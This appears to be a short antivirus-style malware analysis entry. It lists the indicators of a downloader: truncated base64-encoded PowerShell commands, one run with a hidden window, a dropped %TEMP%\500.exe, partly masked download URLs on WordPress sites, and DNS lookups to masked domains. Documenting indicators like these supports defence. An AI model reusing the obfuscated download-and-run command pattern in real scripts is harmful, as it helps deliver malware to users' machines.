Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABjAGsAVgBEADUAagA9ACgAJwBzACcAKwAnAE0ANgAnACsAJwByAHoAUwBGADcAJwApADsAJABPAGEAdwBLAGMAbgA9AG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABiAHAAcABJADkAMQBuAGEAPQAoAC...
- %TEMP%\500.exe
- %TEMP%\500.exe
- http://www.le####vatzenith.com/5TwfiKgZzV
- http://ds#c.cl/wp/wp-content/uploads/hILRunEIdV
- DNS ASK le####vatzenith.com
- DNS ASK ef##m.com
- DNS ASK do###ncyapi.com
- DNS ASK ds#c.cl
- DNS ASK su#######arinabay-nhatrang.net
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABjAGsAVgBEADUAagA9ACgAJwBzACcAKwAnAE0ANgAnACsAJwByAHoAUwBGADcAJwApADsAJABPAGEAdwBLAGMAbgA9AG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABiAHAAcABJADkAMQBuAGEAPQAoAC...' (со скрытым окном)